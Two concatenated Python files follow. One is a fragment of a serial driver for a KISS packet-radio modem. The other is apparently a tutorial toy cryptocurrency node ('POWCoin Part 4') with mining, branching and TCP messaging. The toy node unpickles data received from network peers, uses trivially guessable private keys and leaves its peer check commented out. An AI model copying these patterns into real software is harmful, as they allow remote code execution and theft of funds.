HANDLE_SERIAL_NUMBER = 47 # API 2.0
HANDLE_MAC_ADDRESS = 48
HANDLE_DATE_TIME = 49 # API 2.0
HANDLE_BLUETOOTH_NAME = 66
HANDLE_CONNECTION_TRACKING = 70
HANDLE_USB_POWER_ON = 74
HANDLE_USB_POWER_OFF = 76
HANDLE_MIN_INPUT_TWIST = 121 # API 2.0
HANDLE_MAX_INPUT_TWIST = 122 # API 2.0
HANDLE_API_VERSION = 123 # API 2.0
HANDLE_MIN_INPUT_GAIN = 124 # API 2.0
HANDLE_MAX_INPUT_GAIN = 125 # API 2.0
HANDLE_CAPABILITIES = 126
HANDLE_EXTENDED_1 = 0xc1
HANDLE_EXT1_SELECTED_MODEM_TYPE = 0x81
HANDLE_EXT1_SUPPORTED_MODEM_TYPES = 0x83
HANDLE_PTT_CHANNEL = 80
HANDLE_PASSALL = 82
HANDLE_RX_REVERSE_POLARITY = 84
HANDLE_TX_REVERSE_POLARITY = 86
CAP_EEPROM_SAVE = 0x0200
CAP_ADJUST_INPUT = 0x0400
CAP_DFU_FIRMWARE = 0x0800
def __init__(self, app, ser):
self.app = app
self.serial = ser
self.decoder = KissDecode()
self.encoder = KissEncode()
self.ser = None
self.thd = None
self.tone = self.TONE_NONE
self.ptt = False
self.reading = False
self.api_version = 0x0100
def __del__(self):
self.disconnect()
def connected(self):
return self.ser is not None
def connect(self):
if self.connected(): return
try:
# print("connecting to %s" % self.serial)
self.ser = serial.Serial(self.serial, 38400, timeout=.1)
# print("connected")
time.sleep(1)
self.sio_reader = self.ser # io.BufferedReader(self.ser)
self.sio_writer = self.ser # io.BufferedWriter(self.ser)
self.app.tnc_connect()
self.reading = True
self.thd = threading.Thread(target=self.readSerial, args=(self.sio_reader,))
self.thd.start()
self.sio_writer.write(self.encoder.encode(self.PTT_OFF))
self.sio_writer.flush()
time.sleep(1)
self.sio_writer.write(self.encoder.encode(self.GET_ALL_VALUES))
self.sio_writer.flush()
time.sleep(1)
self.sio_writer.write(self.encoder.encode(self.STREAM_VOLUME))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def internal_reconnect(self):
try:
self.sio_reader = self.ser
self.sio_writer = self.ser
self.reading = True
self.thd = threading.Thread(target=self.readSerial, args=(self.sio_reader,))
self.thd.start()
return True
except Exception as e:
self.app.exception(e)
return False
def reconnect(self):
if self.internal_reconnect():
self.app.tnc_connect()
self.sio_writer.write(self.encoder.encode(self.PTT_OFF))
self.sio_writer.flush()
time.sleep(1)
self.sio_writer.write(self.encoder.encode(self.GET_ALL_VALUES))
self.sio_writer.flush()
time.sleep(1)
self.sio_writer.write(self.encoder.encode(self.STREAM_VOLUME))
self.sio_writer.flush()
def internal_disconnect(self):
self.reading = False
if self.thd is not None:
try:
if self.sio_writer is not None:
self.sio_writer.write(self.encoder.encode(self.POLL_VOLUME))
self.sio_writer.flush()
self.thd.join()
self.thd = None
except Exception as e:
self.app.exception(e)
def disconnect(self):
self.internal_disconnect()
if self.app is not None: self.app.tnc_disconnect()
if self.ser is not None: self.ser.close()
self.ser = None
self.sio_writer = None
self.sio_reader = None
def update_rx_volume(self, value):
self.app.tnc_rx_volume(value)
def handle_packet(self, packet):
# print(packet.sub_type, packet.data)
if packet.packet_type == 0x07:
print(packet.data)
elif packet.packet_type != 0x06:
return
elif packet.sub_type == self.HANDLE_INPUT_LEVEL:
self.handle_input_level(packet)
elif packet.sub_type == self.HANDLE_TX_VOLUME:
self.handle_tx_volume(packet)
elif packet.sub_type == self.HANDLE_TX_TWIST:
self.handle_tx_twist(packet)
elif packet.sub_type == self.HANDLE_BATTERY_LEVEL:
self.handle_battery_level(packet)
elif packet.sub_type == self.HANDLE_INPUT_ATTEN:
self.handle_input_atten(packet)
elif packet.sub_type == self.HANDLE_INPUT_TWIST:
self.handle_input_twist(packet)
elif packet.sub_type == self.HANDLE_SQUELCH_LEVEL:
self.handle_squelch_level(packet)
elif packet.sub_type == self.HANDLE_TX_DELAY:
self.handle_tx_delay(packet)
elif packet.sub_type == self.HANDLE_PERSISTENCE:
self.handle_persistence(packet)
elif packet.sub_type == self.HANDLE_SLOT_TIME:
self.handle_slot_time(packet)
elif packet.sub_type == self.HANDLE_TX_TAIL:
self.handle_tx_tail(packet)
elif packet.sub_type == self.HANDLE_DUPLEX:
self.handle_duplex(packet)
elif packet.sub_type == self.HANDLE_FIRMWARE_VERSION:
self.handle_firmware_version(packet)
elif packet.sub_type == self.HANDLE_HARDWARE_VERSION:
self.handle_hardware_version(packet)
elif packet.sub_type == self.HANDLE_SERIAL_NUMBER:
self.handle_serial_number(packet)
elif packet.sub_type == self.HANDLE_MAC_ADDRESS:
self.handle_mac_address(packet)
elif packet.sub_type == self.HANDLE_DATE_TIME:
self.handle_date_time(packet)
elif packet.sub_type == self.HANDLE_BLUETOOTH_NAME:
self.handle_bluetooth_name(packet)
elif packet.sub_type == self.HANDLE_CONNECTION_TRACKING:
self.handle_bluetooth_connection_tracking(packet)
elif packet.sub_type == self.HANDLE_VERBOSITY:
self.handle_verbosity(packet)
elif packet.sub_type == self.HANDLE_CAPABILITIES:
self.handle_capabilities(packet)
elif packet.sub_type == self.HANDLE_PTT_CHANNEL:
self.handle_ptt_channel(packet)
elif packet.sub_type == self.HANDLE_USB_POWER_ON:
self.handle_usb_power_on(packet)
elif packet.sub_type == self.HANDLE_USB_POWER_OFF:
self.handle_usb_power_off(packet)
elif packet.sub_type == self.HANDLE_API_VERSION:
self.handle_api_version(packet)
elif packet.sub_type == self.HANDLE_MIN_INPUT_TWIST:
self.handle_min_input_twist(packet)
elif packet.sub_type == self.HANDLE_MAX_INPUT_TWIST:
self.handle_max_input_twist(packet)
elif packet.sub_type == self.HANDLE_MIN_INPUT_GAIN:
self.handle_min_input_gain(packet)
elif packet.sub_type == self.HANDLE_MAX_INPUT_GAIN:
self.handle_max_input_gain(packet)
elif packet.sub_type == self.HANDLE_PASSALL:
self.handle_passall(packet)
elif packet.sub_type == self.HANDLE_RX_REVERSE_POLARITY:
self.handle_rx_reverse_polarity(packet)
elif packet.sub_type == self.HANDLE_TX_REVERSE_POLARITY:
self.handle_tx_reverse_polarity(packet)
elif packet.sub_type == self.HANDLE_EXTENDED_1:
self.handle_extended_range_1(packet)
else:
# print "handle_packet: unknown packet sub_type (%d)" % packet.sub_type
# print "data:", packet.data
pass
def handle_extended_range_1(self, packet):
extended_type = packet.data[0]
packet.data = packet.data[1:]
if extended_type == self.HANDLE_EXT1_SELECTED_MODEM_TYPE:
self.handle_selected_modem_type(packet)
elif extended_type == self.HANDLE_EXT1_SUPPORTED_MODEM_TYPES:
self.handle_supported_modem_types(packet)
else:
pass # Unknown extended type
def readSerial(self, sio):
# print "reading..."
while self.reading:
try:
block = bytes(sio.read(160))
if len(block) == 0: continue
for c in block:
packet = self.decoder.process(c)
if packet is not None:
GLib.idle_add(self.handle_packet, packet)
# self.handle_packet(packet)
except ValueError as e:
self.app.exception(e)
pass
# print "done reading..."
def handle_input_level(self, packet):
v = packet.data[0]
v = max(v, 1)
volume = math.log(v) / math.log(2)
self.app.tnc_rx_volume(volume)
def handle_tx_volume(self, packet):
if self.api_version == 0x0100:
volume = packet.data[0]
else:
volume = (packet.data[0] * 256) + packet.data[1]
self.app.tnc_tx_volume(volume)
def handle_tx_twist(self, packet):
twist = packet.data[0]
self.app.tnc_tx_twist(twist)
def handle_battery_level(self, packet):
value = (packet.data[0] << 8) + packet.data[1]
self.app.tnc_battery_level(value)
# Also HANDLE_INPUT_GAIN
def handle_input_atten(self, packet):
if self.api_version == 0x0100:
atten = packet.data[0]
self.app.tnc_input_atten(atten != 0)
else:
gain = unpack('>h', packet.data)[0]
self.app.tnc_input_gain(gain)
def handle_input_twist(self, packet):
twist = packet.data[0]
self.app.tnc_input_twist(twist)
def handle_squelch_level(self, packet):
squelch = packet.data[0]
self.app.tnc_dcd(squelch)
def handle_tx_delay(self, packet):
value = packet.data[0]
self.app.tnc_tx_delay(value)
def handle_persistence(self, packet):
value = packet.data[0]
self.app.tnc_persistence(value)
def handle_slot_time(self, packet):
value = packet.data[0]
self.app.tnc_slot_time(value)
def handle_tx_tail(self, packet):
value = packet.data[0]
self.app.tnc_tx_tail(value)
def handle_duplex(self, packet):
value = packet.data[0]
self.app.tnc_duplex(value != 0)
def handle_firmware_version(self, packet):
self.app.tnc_firmware_version(packet.data.decode("utf-8"))
def handle_hardware_version(self, packet):
self.app.tnc_hardware_version(packet.data.decode("utf-8"))
def handle_serial_number(self, packet):
self.app.tnc_serial_number(packet.data.decode("utf-8"))
return
def handle_mac_address(self, packet):
self.app.tnc_mac_address(':'.join('{:02X}'.format(a) for a in packet.data))
return
def handle_date_time(self, packet):
def bcd_to_int(value):
return ((value // 16) * 10) + (value & 0x0F)
d = packet.data
# print("raw date:", binascii.hexlify(d))
year = bcd_to_int(d[0]) + 2000
month = bcd_to_int(d[1])
day = bcd_to_int(d[2])
weekday = bcd_to_int(d[3])
hour = bcd_to_int(d[4])
minute = bcd_to_int(d[5])
second = bcd_to_int(d[6])
try:
dt = datetime.datetime(year, month, day, hour, minute, second, tzinfo=utc)
self.app.tnc_date_time(dt.isoformat())
except Exception as ex:
self.app.tnc_date_time("RTC ERROR")
self.app.exception(ex)
def handle_bluetooth_name(self, packet):
pass
def handle_bluetooth_connection_tracking(self, packet):
self.app.tnc_conn_track(packet.data[0])
def handle_verbosity(self, packet):
self.app.tnc_verbose(packet.data[0])
def handle_ptt_channel(self, packet):
self.app.tnc_ptt_style(packet.data[0])
def handle_usb_power_on(self, packet):
self.app.tnc_power_on(packet.data[0])
def handle_usb_power_off(self, packet):
self.app.tnc_power_off(packet.data[0])
def handle_capabilities(self, packet):
if len(packet.data) < 2:
return
value = packet.data[1]
if (value << 8) & self.CAP_EEPROM_SAVE:
self.app.tnc_eeprom_save()
if (value << 8) & self.CAP_ADJUST_INPUT:
self.app.tnc_adjust_input()
if (value << 8) & self.CAP_DFU_FIRMWARE:
self.app.tnc_dfu_firmware()
def handle_api_version(self, packet):
if len(packet.data) < 2:
return
self.api_version = unpack('>h', packet.data)[0]
def handle_min_input_twist(self, packet):
self.app.tnc_min_input_twist(unpack('b', packet.data)[0])
def handle_max_input_twist(self, packet):
self.app.tnc_max_input_twist(unpack('b', packet.data)[0])
def handle_min_input_gain(self, packet):
self.app.tnc_min_input_gain(unpack('>h', packet.data)[0])
def handle_max_input_gain(self, packet):
self.app.tnc_max_input_gain(unpack('>h', packet.data)[0])
def handle_passall(self, packet):
self.app.tnc_passall(packet.data[0])
def handle_rx_reverse_polarity(self, packet):
self.app.tnc_rx_reverse_polarity(packet.data[0])
def handle_tx_reverse_polarity(self, packet):
self.app.tnc_tx_reverse_polarity(packet.data[0])
def handle_selected_modem_type(self, packet):
self.app.tnc_selected_modem_type(packet.data[0])
def handle_supported_modem_types(self, packet):
self.app.tnc_supported_modem_types(packet.data)
def set_tx_volume(self, volume):
if self.sio_writer is None: return
try:
if self.api_version == 0x0100:
self.sio_writer.write(self.encoder.encode(
bytes(pack('>BBB', 6, 1, volume))))
else:
self.sio_writer.write(self.encoder.encode(
bytes(pack('>BBh', 6, 1, volume))))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_tx_twist(self, twist):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(
bytes(pack('>BBb', 6, 0x1a, twist))))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_input_atten(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_INPUT_ATTEN % (2 * value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_squelch_level(self, value):
"""Used to set DCD"""
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_SQUELCH_LEVEL % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_input_gain(self, gain):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(
bytes(pack('>BBh', 6, 0x2, gain))))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_input_twist(self, twist):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(
bytes(pack('>BBb', 6, 0x18, twist))))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def adjust_input(self):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.ADJUST_INPUT_LEVELS))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_tx_delay(self, delay):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_TX_DELAY % delay))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_persistence(self, p):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_PERSISTENCE % (p)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_time_slot(self, timeslot):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_TIME_SLOT % (timeslot)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_tx_tail(self, tail):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_TX_TAIL % (tail)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_duplex(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_DUPLEX % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_conn_track(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_BT_CONN_TRACK % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_verbosity(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_VERBOSITY % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_passall(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_PASSALL % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_rx_reverse_polarity(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_RX_REVERSE_POLARITY % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_tx_reverse_polarity(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_TX_REVERSE_POLARITY % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_modem_type(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_MODEM_TYPE % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_usb_on(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_USB_POWER_ON % chr(value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_usb_off(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_USB_POWER_OFF % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def save_eeprom_settings(self):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SAVE_EEPROM_SETTINGS))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_ptt_channel(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_PTT_CHANNEL % int(value)))
self.sio_writer.write(self.encoder.encode(self.GET_PTT_CHANNEL))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_mark(self, value):
if self.sio_writer is None: return
if value:
self.tone |= self.TONE_MARK
else:
self.tone &= self.TONE_SPACE
self.set_ptt(self.ptt)
def set_space(self, value):
if self.sio_writer is None: return
if value:
self.tone |= self.TONE_SPACE
else:
self.tone &= self.TONE_MARK
self.set_ptt(self.ptt)
def set_ptt(self, value):
if self.sio_writer is None: return
# print "PTT: %s, Tone=%d" % (str(value), self.tone)
self.ptt = value
try:
if value and self.tone != self.TONE_NONE:
if self.tone == self.TONE_MARK:
self.sio_writer.write(self.encoder.encode(self.PTT_MARK))
elif self.tone == self.TONE_SPACE:
self.sio_writer.write(self.encoder.encode(self.PTT_SPACE))
elif self.tone == self.TONE_BOTH:
self.sio_writer.write(self.encoder.encode(self.PTT_BOTH))
else:
self.sio_writer.write(self.encoder.encode(self.PTT_OFF))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def stream_audio_on(self):
if self.sio_writer is None: return
self.sio_writer.write(self.encoder.encode(self.STREAM_VOLUME))
def stream_audio_off(self):
if self.sio_writer is None: return
self.sio_writer.write(self.encoder.encode(self.POLL_VOLUME))
def get_battery_level(self):
if self.sio_writer is None: return
self.sio_writer.write(self.encoder.encode(self.GET_BATTERY_LEVEL))
def upload_firmware_thd(self, filename, gui):
try:
bootloader = BootLoader(self.ser, self.ser, filename, gui)
except Exception as e:
traceback.print_exc()
gui.firmware_failure(str(e))
return
try:
bootloader.load()
if not bootloader.verify():
gui.firmware_failure("Firmware verification failed.")
return
bootloader.exit()
time.sleep(5)
gui.firmware_success()
except Exception as e:
traceback.print_exc()
gui.firmware_failure(str(e))
def upload_firmware(self, filename, gui):
self.internal_disconnect()
self.firmware_thd = threading.Thread(target=self.upload_firmware_thd, args=(filename, gui))
self.firmware_thd.start()
def upload_firmware_complete(self):
self.firmware_thd.join()
time.sleep(5)
self.internal_reconnect()
self.sio_writer.write(self.encoder.encode(self.GET_ALL_VALUES))
|
powcoin_four.py
|
"""
POWCoin Part 4
* Node.handle_block supports creation and extension of branches, but doesn't yet do reorgs
* Define Node.find_in_branch()
* Define Block.__eq__
* Fix how Tx.__repr__ handles genesis block
Usage:
powcoin_four.py serve
powcoin_four.py ping [--node <node>]
powcoin_four.py tx <from> <to> <amount> [--node <node>]
powcoin_four.py balance <name> [--node <node>]
Options:
-h --help Show this screen.
--node=<node> Hostname of node [default: node0]
"""
import uuid, socketserver, socket, sys, argparse, time, os, logging, threading, hashlib, random, re, pickle
from docopt import docopt
from copy import deepcopy
from ecdsa import SigningKey, SECP256k1
PORT = 10000
GET_BLOCKS_CHUNK = 10
BLOCK_SUBSIDY = 50
node = None
lock = threading.Lock()
logging.basicConfig(level="INFO", format='%(threadName)-6s | %(message)s')
logger = logging.getLogger(__name__)
def spend_message(tx, index):
outpoint = tx.tx_ins[index].outpoint
return serialize(outpoint) + serialize(tx.tx_outs)
class Tx:
def __init__(self, id, tx_ins, tx_outs):
self.id = id
self.tx_ins = tx_ins
self.tx_outs = tx_outs
def sign_input(self, index, private_key):
message = spend_message(self, index)
signature = private_key.sign(message)
self.tx_ins[index].signature = signature
def verify_input(self, index, public_key):
tx_in = self.tx_ins[index]
message = spend_message(self, index)
return public_key.verify(tx_in.signature, message)
@property
def is_coinbase(self):
return self.tx_ins[0].tx_id is None
def __eq__(self, other):
return self.id == other.id
class TxIn:
def __init__(self, tx_id, index, signature=None):
self.tx_id = tx_id
self.index = index
self.signature = signature
@property
def outpoint(self):
return (self.tx_id, self.index)
class TxOut:
def __init__(self, tx_id, index, amount, public_key):
self.tx_id = tx_id
self.index = index
self.amount = amount
self.public_key = public_key
@property
def outpoint(self):
return (self.tx_id, self.index)
class Block:
def __init__(self, txns, prev_id, nonce):
self.txns = txns
self.prev_id = prev_id
self.nonce = nonce
@property
def header(self):
return serialize(self)
@property
def id(self):
return hashlib.sha256(self.header).hexdigest()
@property
def proof(self):
return int(self.id, 16)
def __eq__(self, other):
# FIXME WTF it feels like I've defined this 50 times ...
return self.id == other.id
def __repr__(self):
prev_id = self.prev_id[:10] if self.prev_id else None
return f"Block(prev_id={prev_id}... id={self.id[:10]}...)"
class Node:
def __init__(self, address):
self.blocks = []
self.branches = []
self.utxo_set = {}
self.mempool = []
self.peers = []
self.pending_peers = []
self.address = address
def connect(self, peer):
if peer not in self.peers and peer != self.address:
logger.info(f'(handshake) Sent "connect" to {peer[0]}')
try:
send_message(peer, "connect", None)
self.pending_peers.append(peer)
except:
logger.info(f'(handshake) Node {peer[0]} offline')
def sync(self):
blocks = self.blocks[-GET_BLOCKS_CHUNK:]
block_ids = [block.id for block in blocks]
for peer in self.peers:
send_message(peer, "sync", block_ids)
def fetch_utxos(self, public_key):
return [tx_out for tx_out in self.utxo_set.values()
if tx_out.public_key == public_key]
def connect_tx(self, tx):
# Remove utxos that were just spent
if not tx.is_coinbase:
for tx_in in tx.tx_ins:
del self.utxo_set[tx_in.outpoint]
# Save utxos which were just created
for tx_out in tx.tx_outs:
self.utxo_set[tx_out.outpoint] = tx_out
# Clean up mempool
if tx in self.mempool:
self.mempool.remove(tx)
def fetch_balance(self, public_key):
# Fetch utxos associated with this public key
utxos = self.fetch_utxos(public_key)
# Sum the amounts
return sum([tx_out.amount for tx_out in utxos])
def validate_tx(self, tx):
in_sum = 0
out_sum = 0
for index, tx_in in enumerate(tx.tx_ins):
# TxIn spending an unspent output
assert tx_in.outpoint in self.utxo_set
# Grab the tx_out
tx_out = self.utxo_set[tx_in.outpoint]
# Verify signature using public key of TxOut we're spending
public_key = tx_out.public_key
tx.verify_input(index, public_key)
# Sum up the total inputs
amount = tx_out.amount
in_sum += amount
for tx_out in tx.tx_outs:
# Sum up the total outpouts
out_sum += tx_out.amount
# Check no value created or destroyed
assert in_sum == out_sum
def validate_coinbase(self, tx):
assert len(tx.tx_ins) == len(tx.tx_outs) == 1
assert tx.tx_outs[0].amount == BLOCK_SUBSIDY
def handle_tx(self, tx):
if tx not in self.mempool:
self.validate_tx(tx)
self.mempool.append(tx)
# Propogate transaction
for peer in self.peers:
send_message(peer, "tx", tx)
def validate_block(self, block, validate_txns=False):
assert block.proof < POW_TARGET, "Insufficient Proof-of-Work"
if validate_txns:
# Validate coinbase separately
self.validate_coinbase(block.txns[0])
# Check the transactions are valid
for tx in block.txns[1:]:
self.validate_tx(tx)
def find_in_branch(self, block_id):
for branch_index, branch in enumerate(self.branches):
for height, block in enumerate(branch):
if block.id == block_id:
return branch, branch_index, height
return None, None, None
def handle_block(self, block):
# Look up previous block
branch, branch_index, height = self.find_in_branch(block.prev_id)
# Conditions
extends_chain = block.prev_id == self.blocks[-1].id
forks_chain = not extends_chain and \
not branch and \
block.prev_id in [block.id for block in self.blocks]
extends_branch = branch and height == len(branch) - 1
forks_branch = branch and height != len(branch) - 1
# Always validate, but only validate transactions if extending chain
self.validate_block(block, validate_txns=extends_chain)
# Handle each condition separately
if extends_chain:
self.connect_block(block)
logger.info(f"Extended chain to height {len(self.blocks)-1}")
elif forks_chain:
self.branches.append([block])
logger.info(f"Created branch {len(self.branches)-1}")
elif extends_branch:
branch.append(block)
# FIXME: reorg if this branch has more work than our main chain
logger.info(f"Extended branch {branch_index} to {len(branch)}")
elif forks_branch:
self.branches.append(branch[:height+1] + [block])
logger.info(f"Created branch {len(self.branches)-1} to height {len(self.branches[-1]) - 1}")
else:
raise Exception("Couldn't locate parent block")
# Block propogation
for peer in self.peers:
disrupt(func=send_message, args=[peer, "blocks", [block]])
def connect_block(self, block):
# Add the block to our chain
self.blocks.append(block)
# If they're all good, update UTXO set / mempool
for tx in block.txns:
self.connect_tx(tx)
def prepare_simple_tx(utxos, sender_private_key, recipient_public_key, amount):
sender_public_key = sender_private_key.get_verifying_key()
# Construct tx.tx_outs
tx_ins = []
tx_in_sum = 0
for tx_out in utxos:
tx_ins.append(TxIn(tx_id=tx_out.tx_id, index=tx_out.index, signature=None))
tx_in_sum += tx_out.amount
if tx_in_sum > amount:
break
# Make sure sender can afford it
assert tx_in_sum >= amount
# Construct tx.tx_outs
tx_id = uuid.uuid4()
change = tx_in_sum - amount
tx_outs = [
TxOut(tx_id=tx_id, index=0, amount=amount, public_key=recipient_public_key),
TxOut(tx_id=tx_id, index=1, amount=change, public_key=sender_public_key),
]
# Construct tx and sign inputs
tx = Tx(id=tx_id, tx_ins=tx_ins, tx_outs=tx_outs)
for i in range(len(tx.tx_ins)):
tx.sign_input(i, sender_private_key)
return tx
def prepare_coinbase(public_key, tx_id=None):
if tx_id is None:
tx_id = uuid.uuid4()
return Tx(
id=tx_id,
tx_ins=[
TxIn(None, None, None),
],
tx_outs=[
TxOut(tx_id=tx_id, index=0, amount=BLOCK_SUBSIDY,
public_key=public_key),
],
)
##########
# Mining #
##########
DIFFICULTY_BITS = 15
POW_TARGET = 2 ** (256 - DIFFICULTY_BITS)
mining_interrupt = threading.Event()
def mine_block(block):
while block.proof >= POW_TARGET:
# TODO: accept interrupts here if tip changes
if mining_interrupt.is_set():
logger.info("Mining interrupted")
mining_interrupt.clear()
return
block.nonce += 1
return block
def mine_forever(public_key):
logging.info("Starting miner")
while True:
coinbase = prepare_coinbase(public_key)
unmined_block = Block(
txns=[coinbase] + node.mempool,
prev_id=node.blocks[-1].id,
nonce=random.randint(0, 1000000000),
)
mined_block = mine_block(unmined_block)
if mined_block:
logger.info("")
logger.info("Mined a block")
with lock:
node.handle_block(mined_block)
def mine_genesis_block(node, public_key):
coinbase = prepare_coinbase(public_key, tx_id="abc123")
unmined_block = Block(txns=[coinbase], prev_id=None, nonce=0)
mined_block = mine_block(unmined_block)
node.blocks.append(mined_block)
node.connect_tx(coinbase)
return mined_block
##############
# Networking #
##############
def serialize(coin):
return pickle.dumps(coin)
def deserialize(serialized):
return pickle.loads(serialized)
def read_message(s):
message = b''
# Our protocol is: first 4 bytes signify message length
raw_message_length = s.recv(4) or b"\x00"
message_length = int.from_bytes(raw_message_length, 'big')
while message_length > 0:
chunk = s.recv(1024)
message += chunk
message_length -= len(chunk)
return deserialize(message)
def prepare_message(command, data):
message = {
"command": command,
"data": data,
}
serialized_message = serialize(message)
length = len(serialized_message).to_bytes(4, 'big')
return length + serialized_message
def disrupt(func, args):
# Simulate packet loss
if random.randint(0, 10) != 0:
# Simulate network latency
threading.Timer(random.random(), func, args).start()
class TCPHandler(socketserver.BaseRequestHandler):
def get_canonical_peer_address(self):
ip = self.client_address[0]
try:
hostname = socket.gethostbyaddr(ip)
hostname = re.search(r"_(.*?)_", hostname[0]).group(1)
except:
hostname = ip
return (hostname, PORT)
def respond(self, command, data):
response = prepare_message(command, data)
return self.request.sendall(response)
def handle(self):
message = read_message(self.request)
command = message["command"]
data = message["data"]
peer = self.get_canonical_peer_address()
# Handshake / Authentication
if command == "connect":
if peer not in node.pending_peers and peer not in node.peers:
node.pending_peers.append(peer)
logger.info(f'(handshake) Accepted "connect" request from "{peer[0]}"')
send_message(peer, "connect-response", None)
elif command == "connect-response":
if peer in node.pending_peers and peer not in node.peers:
node.pending_peers.remove(peer)
node.peers.append(peer)
logger.info(f'(handshake) Connected to "{peer[0]}"')
send_message(peer, "connect-response", None)
# Request their peers
send_message(peer, "peers", None)
# else:
# assert peer in node.peers, \
# f"Rejecting {command} from unconnected {peer[0]}"
# Business Logic
if command == "peers":
send_message(peer, "peers-response", node.peers)
if command == "peers-response":
for peer in data:
node.connect(peer)
if command == "ping":
self.respond(command="pong", data="")
if command == "sync":
# Find our most recent block peer doesn't know about,
# But which build off a block they do know about.
peer_block_ids = data
for block in node.blocks[::-1]:
if block.id not in peer_block_ids \
and block.prev_id in peer_block_ids:
height = node.blocks.index(block)
blocks = node.blocks[height:height+GET_BLOCKS_CHUNK]
send_message(peer, "blocks", blocks)
logger.info('Served "sync" request')
return
logger.info('Could not serve "sync" request')
if command == "blocks":
for block in data:
try:
with lock:
node.handle_block(block)
mining_interrupt.set()
except:
logger.info("Rejected block")
if len(data) == GET_BLOCKS_CHUNK:
node.sync()
if command == "tx":
node.handle_tx(data)
if command == "balance":
balance = node.fetch_balance(data)
self.respond(command="balance-response", data=balance)
if command == "utxos":
utxos = node.fetch_utxos(data)
self.respond(command="utxos-response", data=utxos)
def external_address(node):
i = int(node[-1])
port = PORT + i
return ('localhost', port)
def serve():
logger.info("Starting server")
server = socketserver.TCPServer(("0.0.0.0", PORT), TCPHandler)
server.serve_forever()
def send_message(address, command, data, response=False):
message = prepare_message(command, data)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect(address)
s.sendall(message)
if response:
return read_message(s)
#######
# CLI #
#######
def lookup_private_key(name):
exponent = {
"alice": 1, "bob": 2, "node0": 3, "node1": 4, "node2": 5
}[name]
return SigningKey.from_secret_exponent(exponent, curve=SECP256k1)
def lookup_public_key(name):
return lookup_private_key(name).get_verifying_key()
def main(args):
if args["serve"]:
threading.current_thread().name = "main"
name = os.environ["NAME"]
duration = 10 * ["node0", "node1", "node2"].index(name)
time.sleep(duration)
global node
node = Node(address=(name, PORT))
# Alice is Satoshi!
mine_genesis_block(node, lookup_public_key("alice"))
# Start server thread
server_thread = threading.Thread(target=serve, name="server")
server_thread.start()
# Join the network
peers = [(p, PORT) for p in os.environ['PEERS'].split(',')]
for peer in peers:
node.connect(peer)
# Wait for peer connections
time.sleep(1)
# Do initial block download
node.sync()
# Wait for IBD to finish
time.sleep(1)
# Start miner thread
miner_public_key = lookup_public_key(name)
miner_thread = threading.Thread(target=mine_forever,
args=[miner_public_key], name="miner")
miner_thread.start()
elif args["ping"]:
address = external_address(args["--node"])
send_message(address, "ping", "")
elif args["balance"]:
public_key = lookup_public_key(args["<name>"])
address = external_address(args["--node"])
response = send_message(address, "balance", public_key, response=True)
print(response["data"])
elif args["tx"]:
# Grab parameters
sender_private_key = lookup_private_key(args["<from>"])
sender_public_key = sender_private_key.get_verifying_key()
recipient_private_key = lookup_private_key(args["<to>"])
recipient_public_key = recipient_private_key.get_verifying_key()
amount = int(args["<amount>"])
address = external_address(args["--node"])
# Fetch utxos available to spend
response = send_message(address, "utxos", sender_public_key, response=True)
utxos = response["data"]
# Prepare transaction
tx = prepare_simple_tx(utxos, sender_private_key, recipient_public_key, amount)
# send to node
send_message(address, "tx", tx)
else:
print("Invalid command")
